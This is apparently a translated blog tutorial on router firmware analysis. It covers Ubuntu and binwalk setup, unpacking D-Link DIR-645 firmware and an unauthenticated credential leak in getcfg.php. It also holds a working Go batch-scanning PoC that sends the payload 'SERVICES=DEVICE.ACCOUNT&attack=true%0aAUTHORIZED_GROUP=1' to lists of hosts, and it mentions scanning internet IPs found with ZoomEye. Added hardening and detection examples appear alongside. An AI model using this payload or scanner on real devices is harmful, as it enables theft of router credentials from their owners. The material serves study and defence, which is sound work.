A first attempt at router firmware: sharing experience with related vulnerabilities
This article uses vulnerabilities related to router firmware as the demonstration and shares the experience from zero to one.
Set up Ubuntu 16.04 in a local virtual machine
Ubuntu ISO download address: http://mirrors.aliyun.com/ubuntu-releases/
After installation, set a password for the root user:
sudo passwd root
Switch to the root user:
su root
Switch the package sources to the Aliyun mirror:
vi /etc/apt/sources.list
With the file open, do nothing else: type ggdG to clear the file's current contents (note that the G is upper-case).
ggdG
Then paste the following:
#deb cdrom:[Ubuntu 16.04 LTS Xenial Xerus - Release amd64 (20160420.1)]/ xenial main restricted
deb-src http://archive.ubuntu.com/ubuntu xenial main restricted #Added by software-properties
deb http://mirrors.aliyun.com/ubuntu/ xenial main restricted
deb-src http://mirrors.aliyun.com/ubuntu/ xenial main restricted multiverse universe #Added by software-properties
deb http://mirrors.aliyun.com/ubuntu/ xenial-updates main restricted
deb-src http://mirrors.aliyun.com/ubuntu/ xenial-updates main restricted multiverse universe #Added by software-properties
deb http://mirrors.aliyun.com/ubuntu/ xenial universe
deb http://mirrors.aliyun.com/ubuntu/ xenial-updates universe
deb http://mirrors.aliyun.com/ubuntu/ xenial multiverse
deb http://mirrors.aliyun.com/ubuntu/ xenial-updates multiverse
deb http://mirrors.aliyun.com/ubuntu/ xenial-backports main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ xenial-backports main restricted universe multiverse #Added by software-properties
deb http://archive.canonical.com/ubuntu xenial partner
deb-src http://archive.canonical.com/ubuntu xenial partner
deb http://mirrors.aliyun.com/ubuntu/ xenial-security main restricted
deb-src http://mirrors.aliyun.com/ubuntu/ xenial-security main restricted multiverse universe #Added by software-properties
deb http://mirrors.aliyun.com/ubuntu/ xenial-security universe
deb http://mirrors.aliyun.com/ubuntu/ xenial-security multiverse
Update the package lists (note that the mirror entries differ between Ubuntu versions):
sudo apt-get update
Install Python 3.7
Ubuntu 16.04 ships with Python 3.5, while Binwalk requires 3.6 or later.
sudo add-apt-repository ppa:deadsnakes/ppa
sudo apt-get update
sudo apt-get install python3.7
Change which python3 the system's alternatives point to:
sudo update-alternatives --install /usr/bin/python3 python3 /usr/bin/python3.5 1
sudo update-alternatives --install /usr/bin/python3 python3 /usr/bin/python3.7 2
The update-alternatives command changes where the symlinks for the system's default commands point; the following command lets you switch the python3 target interactively:
sudo update-alternatives --config python3
Check that the installation succeeded by printing the version:
python3 -V
Install binwalk (or skip ahead and use the automated tool described later under "Automatic binwalk installation")
git clone https://github.com/ReFirmLabs/binwalk.git
cd binwalk
sudo ./deps.sh
sudo python3 setup.py install
Install unzip:
apt install unzip
Unpack the firmware:
unzip DLink_DIR645_A1_FW102B08.zip
As the screenshot above shows, the firmware unpacks successfully.
DIR-645 information disclosure
For example, here is the DIR-645 firmware package; go straight to the getcfg.php file under the web directory:
HTTP/1.1 200 OK
Content-Type: text/xml
<?echo "<?";?>xml version="1.0" encoding="utf-8"<?echo "?>";?>
<postxml>
<?
include "/htdocs/phplib/trace.php";
if ($_POST["CACHE"] == "true")
{
	echo dump(1, "/runtime/session/".$SESSION_UID."/postxml");
}
else
{
	/* cut_count() will return 0 when no or only one token. */
	$SERVICE_COUNT = cut_count($_POST["SERVICES"], ",");
	TRACE_debug("GETCFG: got ".$SERVICE_COUNT." service(s): ".$_POST["SERVICES"]);
	$SERVICE_INDEX = 0;
	while ($SERVICE_INDEX < $SERVICE_COUNT)
	{
		$GETCFG_SVC = cut($_POST["SERVICES"], $SERVICE_INDEX, ",");
		TRACE_debug("GETCFG: serivce[".$SERVICE_INDEX."] = ".$GETCFG_SVC);
		if ($GETCFG_SVC!="")
		{
			$file = "/htdocs/webinc/getcfg/".$GETCFG_SVC.".xml.php";
			/* GETCFG_SVC will be passed to the child process. */
			if (isfile($file)=="1") dophp("load", $file);
		}
		$SERVICE_INDEX++;
	}
}
?>
</postxml>
Reading the source, the service name is taken straight from $_POST["SERVICES"] and concatenated into the path /htdocs/webinc/getcfg/<SERVICE>.xml.php, and nothing in this script checks whether the caller is logged in. Requesting the DEVICE.ACCOUNT service therefore loads /htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml.php, which discloses the username and password.
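To make the missing checks concrete, here is an added example (not code from the original post or from the D-Link firmware) that re-implements the getcfg.php dispatch loop in Go with the two controls the PHP above lacks: the service name must be a well-formed dotted identifier before it is ever turned into a filename, and any service outside a small public allowlist requires an authenticated session. The allowlist, the "sid" session cookie, the value "demo-session", the Decision type and the probe helper are all constructed for this example. The request bodies in main are the ones the PoC in this article sends; because the authenticated flag is derived from the session and never from a variable in the POST body, the AUTHORIZED_GROUP=1 fragment has no effect.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"net/url"
	"regexp"
	"strings"
)

// Hypothetical allowlist of services an unauthenticated client may read.
// DEVICE.ACCOUNT is deliberately absent: it carries credentials.
var publicServices = map[string]bool{
	"DEVICE.INFO": true,
}

// A service name is a dotted run of upper-case letters and digits. Anything
// else (path separators, newlines, empty tokens) is rejected before it is
// ever turned into a filename.
var serviceNamePattern = regexp.MustCompile(`^[A-Z0-9]+(\.[A-Z0-9]+)*$`)

// Decision is the result of validating one SERVICES list.
type Decision struct {
	Status   int      // HTTP status to answer with
	Services []string // services that may be loaded (empty unless Status is 200)
}

// decide mirrors the loop in getcfg.php but adds the two missing checks:
// the name must be well-formed, and sensitive services need a session.
func decide(form url.Values, authenticated bool) Decision {
	var allowed []string
	for _, svc := range strings.Split(form.Get("SERVICES"), ",") {
		svc = strings.TrimSpace(svc)
		if svc == "" {
			continue
		}
		if !serviceNamePattern.MatchString(svc) {
			return Decision{Status: http.StatusBadRequest}
		}
		if !authenticated && !publicServices[svc] {
			return Decision{Status: http.StatusUnauthorized}
		}
		allowed = append(allowed, svc)
	}
	return Decision{Status: http.StatusOK, Services: allowed}
}

// getcfgHandler is the hardened stand-in for getcfg.php. The session check is
// a constructed stand-in (cookie "sid" must equal "demo-session"); the point
// is that it reads the session, never a variable supplied in the POST body.
func getcfgHandler(w http.ResponseWriter, r *http.Request) {
	if r.Method != http.MethodPost {
		w.WriteHeader(http.StatusMethodNotAllowed)
		return
	}
	if err := r.ParseForm(); err != nil {
		w.WriteHeader(http.StatusBadRequest)
		return
	}
	c, err := r.Cookie("sid")
	authenticated := err == nil && c.Value == "demo-session"
	d := decide(r.PostForm, authenticated)
	w.WriteHeader(d.Status)
	for _, svc := range d.Services {
		// Stand-in for dophp("load", "/htdocs/webinc/getcfg/<svc>.xml.php").
		fmt.Fprintf(w, "<%s/>\n", svc)
	}
}

// probe sends one form body to the handler in-process and returns the status.
func probe(body, sessionCookie string) int {
	req := httptest.NewRequest(http.MethodPost, "/getcfg.php", strings.NewReader(body))
	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
	if sessionCookie != "" {
		req.AddCookie(&http.Cookie{Name: "sid", Value: sessionCookie})
	}
	rec := httptest.NewRecorder()
	getcfgHandler(rec, req)
	return rec.Code
}

func main() {
	// The article's probe body without a session, then with one, then a malformed name.
	fmt.Println(probe("SERVICES=DEVICE.ACCOUNT&attack=true%0aAUTHORIZED_GROUP=1", "")) // 401
	fmt.Println(probe("SERVICES=DEVICE.ACCOUNT", "demo-session"))                       // 200
	fmt.Println(probe("SERVICES=..%2F..%2Fetc%2Fpasswd", "demo-session"))               // 400
}
```

The allowlist is intentionally tiny; the real design choice is which XML fragments contain no secrets, and anything not on that list is treated as sensitive by default.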
Batch detection script
Just write a quick PoC:
package main

import (
	"bufio"
	"crypto/tls"
	"flag"
	"fmt"
	"io"
	"io/ioutil"
	"net/http"
	"os"
	"strings"
	"sync"

	"github.com/fatih/color"
)

func exec(targetURL string, isbatch bool) {
	PostData := `SERVICES=DEVICE.ACCOUNT&attack=true%0aAUTHORIZED_GROUP=1` /* build the payload */
	/* build the HTTP client and skip TLS certificate verification */
	cli := &http.Client{Transport: &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true}}}
	if !strings.Contains(targetURL, "http") {
		targetURL = "http://" + targetURL
	}
	request, err := http.NewRequest(http.MethodPost, targetURL+"/getcfg.php", strings.NewReader(PostData))
	if err != nil {
		fmt.Println(err)
		return // a nil request must not be sent
	}
	request.Header.Add("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0")
	request.Header.Add("Connection", "close")
	request.Header.Add("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8")
	request.Header.Add("Accept-Encoding", "gzip, deflate")
	request.Header.Add("Upgrade-Insecure-Requests", "1")
	request.Header.Add("Accept-Language", "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2")
	do, err := cli.Do(request) /* send the request */
	if err != nil {
		return
	}
	defer func() { _ = do.Body.Close() }()
	if do.StatusCode == 404 {
		return
	} else if do.StatusCode == 200 {
		all, _ := ioutil.ReadAll(do.Body)
		/* report in both single and batch mode; return so the "not vulnerable" line is not printed as well */
		if strings.Contains(string(all), "DEVICE.ACCOUNT") {
			color.Blue(fmt.Sprintf("%s 存在漏洞\n", targetURL))
			return
		}
	}
	color.Red(fmt.Sprintf("%s 不存在漏洞\n", targetURL))
}

func main() {
	var wg sync.WaitGroup
	var targetURL, filepath string
	flag.StringVar(&targetURL, "u", "", "")
	flag.StringVar(&filepath, "l", "", "")
	flag.CommandLine.Usage = func() {
		fmt.Println("使用说明:\n执行命令:./main -u http://127.0.0.1:8080 \n批量检测:./main -l url.txt ")
	}
	flag.Parse()
	if len(targetURL) == 0 {
		file, err := os.OpenFile(filepath, os.O_RDWR, 0666)
		if err != nil {
			fmt.Println("Open file error!", err)
			return
		}
		defer file.Close()
		buf := bufio.NewReader(file)
		for {
			line, err := buf.ReadString('\n')
			line = strings.TrimSpace(line)
			if line != "" { /* skip blank lines, including the empty read at EOF */
				wg.Add(1)
				a := line
				go func() {
					exec(a, true)
					wg.Done()
				}()
			}
			if err != nil {
				if err == io.EOF {
					break
				}
				fmt.Println("Read file error!", err)
				return
			}
		}
	} else {
		exec(targetURL, false)
	}
	wg.Wait()
}
Using IPs crawled from the internet with ZoomEye, not a single one was vulnerable. Haha, awkward.
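The request the PoC above sends has a recognisable shape for anyone defending these devices. As an added defender-side example (not part of the original post), the following Go program parses wire-format HTTP requests, as an inline proxy or IDS would see them, and flags two signatures visible in the article's payload: a SERVICES list naming DEVICE.ACCOUNT, and a CR/LF inside a form field. The sample requests, their RFC 5737 hosts, the Finding type and the rawRequest helper are all constructed for this example.

```go
package main

import (
	"bufio"
	"fmt"
	"io"
	"net/http"
	"net/url"
	"strings"
)

// Finding describes one request flagged by inspect.
type Finding struct {
	Host   string
	Reason string
}

// rawRequest builds a wire-format HTTP request for the constructed samples below.
func rawRequest(method, path, host, body string) string {
	return fmt.Sprintf("%s %s HTTP/1.1\r\nHost: %s\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\n\r\n%s",
		method, path, host, len(body), body)
}

// Constructed samples of what an inline proxy or IDS would hand to the detector.
var sampleRequests = []string{
	// The probe body used by the PoC in this article.
	rawRequest("POST", "/getcfg.php", "192.0.2.10", "SERVICES=DEVICE.ACCOUNT&attack=true%0aAUTHORIZED_GROUP=1"),
	// A benign read of a non-sensitive service.
	rawRequest("POST", "/getcfg.php", "192.0.2.11", "SERVICES=DEVICE.INFO"),
	// Unrelated traffic.
	rawRequest("GET", "/index.php", "192.0.2.12", ""),
	// A newline smuggled into a form value, aimed at a different service.
	rawRequest("POST", "/getcfg.php", "192.0.2.13", "SERVICES=WAN.STATUS&x=1%0aAUTHORIZED_GROUP=1"),
}

// inspect parses one raw request and returns a Finding if it matches either
// signature: a request for DEVICE.ACCOUNT, or a CR/LF inside a form field.
func inspect(raw string) (*Finding, error) {
	req, err := http.ReadRequest(bufio.NewReader(strings.NewReader(raw)))
	if err != nil {
		return nil, err
	}
	if req.Method != http.MethodPost || req.URL.Path != "/getcfg.php" {
		return nil, nil
	}
	body, err := io.ReadAll(req.Body)
	if err != nil {
		return nil, err
	}
	form, err := url.ParseQuery(string(body))
	if err != nil {
		return nil, err
	}
	for _, svc := range strings.Split(form.Get("SERVICES"), ",") {
		if strings.TrimSpace(svc) == "DEVICE.ACCOUNT" {
			return &Finding{Host: req.Host, Reason: "getcfg.php request for DEVICE.ACCOUNT (credential fragment)"}, nil
		}
	}
	for key, values := range form {
		for _, v := range values {
			if strings.ContainsAny(key+v, "\r\n") {
				return &Finding{Host: req.Host, Reason: "CR/LF inside form field " + key}, nil
			}
		}
	}
	return nil, nil
}

// scan runs inspect over many requests and collects the findings. A request the
// parser rejects is reported too, since malformed traffic deserves a look.
func scan(raws []string) []Finding {
	var out []Finding
	for _, raw := range raws {
		f, err := inspect(raw)
		if err != nil {
			out = append(out, Finding{Reason: "unparseable request: " + err.Error()})
			continue
		}
		if f != nil {
			out = append(out, *f)
		}
	}
	return out
}

func main() {
	for _, f := range scan(sampleRequests) {
		fmt.Printf("%-12s %s\n", f.Host, f.Reason)
	}
}
```

Matching on the decoded form fields rather than on the raw body is what makes the CR/LF check robust: the probe encodes the newline as %0a, and a detector that grepped the raw bytes for a literal newline would miss it.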
安裝自動(dòng)化分析固件firmware-analysis-toolkit
如果qemu或者binwalk出錯(cuò),可以嘗試按照之前說(shuō)的操作來(lái)手動(dòng)安裝。
git clone https://github.com/attify/firmware-analysis-toolkit cd firmware-analysis-toolkit ./setup.sh修改配置文件fat.config
fat.py 運(yùn)行的時(shí)候需要獲取sudo 密碼,和firmadyne的路徑
把地址替換成自己的,如下
[DEFAULT] sudo_password=root firmadyne_path=/home/txf/Desktop/firmware-analysis-toolkit/firmadyne ./fat.py xxx.bin運(yùn)氣好就會(huì)出現(xiàn)下面啟動(dòng)成功的提示
運(yùn)氣不好就是起不來(lái)。
當(dāng)然,畢竟是虛擬環(huán)境,很多情況下會(huì)遇到各種各樣的問(wèn)題,所以有條件的還是買真機(jī)來(lái)調(diào)試吧【想領(lǐng)取網(wǎng)絡(luò)安全資料的朋友才能點(diǎn)】